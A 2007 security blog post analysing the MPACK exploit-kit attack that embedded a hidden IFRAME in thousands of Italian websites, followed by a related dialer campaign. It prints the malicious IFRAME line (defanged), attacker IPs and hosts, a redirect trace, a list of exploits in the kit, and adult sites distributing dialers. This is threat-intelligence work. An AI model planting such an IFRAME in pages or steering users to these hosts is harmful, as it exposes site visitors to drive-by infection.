Wednesday, June 20, 2007

Massive Embedded Web Attack in Italy

The Web is abuzz with news stories regarding the MPACK web exploitation kit installed on over 10,000 mostly Italian based sites, and in the spirit of previous analyses of malicious URLs here's an overview of the strategy of the attack, the outcome, and IPs in quesiton, thus the ones that should get blacklisted or CYBERINT applied for further juicy details on the severity of the attack.

The strategy of the attack
Picture yourself in the position of a malicious attacker wanting to infect the highest number of PCs possible in the shortest timeframe. How would you go for infecting the highest possible proportion of internet surfers using outdated software, ones still living in the "don't open .exe attachments" self-vigilance world? You'll either figure out a way to exploit vulnerabilities within a huge number of web sites and automatically embed the malicious payload, or breach a shared hosting provider and infect all of its customer, thus potentially infecting all of their future visitors. Which is exactly what happened in the most recent case of what's turning into a massive epidemic of MPACK embedded sites.

The outcome of the attack
- Over 10,000 sites affected according to WebSense
- hundreds of thousands PCs currently infected according to obtained MPACK statistics
- the majority of infected PCs are located in Italy given the breach of the shared hosting provider Aruba

Dissecting the attack
It all started when popular Italian sites had the following IFRAME embedded within their front pages :

name='StatPage' src='hllp://58.65.239.180/' width=5 height=5

The entire attack is currently orbiting around the following IPs :

58.65.239.180
64.38.33.13
194.146.207.129
194.146.207.18
194.146.207.23
81.177.8.30
203.121.71.183
81.95.148.42
81.95.149.114

Input URL: 58.65.239.180
Effective URL: hllp://truman.dnspathing.com/suspended.page/
Responding IP: 64.38.33.10
HTTP/1.1 302 Moved TemporarilyServer: nginx/0.5.17
Date: Tue, 19 Jun 2007 22:56:01 GMT
Content-Type: text/html
Content-Length: 161
Connection: keep-alive
Location: hllp://64.38.33.13/~ftpcom/

More coverage :
ISC, Symantec, WebSense, TrendMicro, Finjan -- great to see they came across my analysis of ms-counter.com as well -- PandaLabs.

UPDATE:

MPACK's Builder Screenshot courtesy of Symantec. Meanwhile, here are the exploits available in the latest 0.90 release of the web exploitation kit :

- modified MS06-014
- MS06-006 Firefox 1.5.x Opera 7.x
- 0day Win2000 (ms06-044)
- XML overflow under XP2k3
- WebViewFolderIcon overflow
- WinZip ActiveX overflow
- QuickTime overflow
- ANI overflow

The majority of news articles I came across to are emphasizing that the kit is available for sale at $1000. True, but only if you're purchasing it from the original source, namely, the kit has been a commodity for quite a while, with different propositions modifying the source code and selling it for much less, even bargaining with it in case someone's interested in the associated in the related underground services offered.

Even more ironic in the case of this particular attack is that while performing the cyber forensics part, I came across another malicious site farm hosting dialers courtesy of CARPEDIEM. And while the IFRAME part of the massive embedded Italy based attack was gone in the time of checking the dialers, even previous instances of CoolWebSearch were still in place. The second malicious campaign is run via sv2.biz, campaign id = 15682, all the p0rn sites at 193.110.146.69 which is hosting all the dialers-embedded sites in question. From another perspective the benefits of infecting a web sites farm run on a single IP with probably hundreds of thousands of visitors in the shortest timeframe possible, has a major flaw, blocking 192.110.146.69 aka CARPEDIEM, which is a matter of fact listed by Google as a harmful site will temporarily mitigate the threat.

Initiating traceback of a site that's participating in two malicious campaigns :

1 -> hllp://www.dojinshi.biz/dojin/
Responding IP: 62.149.130.37

2 -> Sites spreading the dialers within :

hllp://www.analream.com/index.html?id=15682
Responding IP: 193.110.146.69

Dynamics of infection :

basically, the host name is identical with the distributed .exe's

My_Param['rf'] = "AnalReamV2KTU";
My_Param['id_produit'] = 550;
My_Param['id_site'] = 995;
My_Param['synergie'] = 'h';
My_Param['color'] = 'fire';
My_Param['name_kit'] = "AnalReam.exe"

Here's the entire campaign list :

asian-booty.com/?id=15682
bukkakenation.com/us/index.html?id=15682
devilteen.com/?id=15682
fetishcell.com/?id=15682
flowerbabes.com/index.html?id=15682
mrstrollop.co.uk/index.html?id=15682
sexyharem.com/?id=15682
sorority-house.com/index.html?id=15682
sublimanal.com/us/index.html?id=15682
tottyunited.co.uk/index.html?id=15682
trashedtramps.com/?id=15682
gangbangdemolition.com/us/?id=15682
gothnymphs.com/?id=15682
kinkythighs.com/?id=15682
porndivinity.com/?id=15682
newhentai.com/us/index.html?&id=15682
kumtomi.com/index.html?&id=15682

Situational awareness at its best is what truly matter at the bottom line.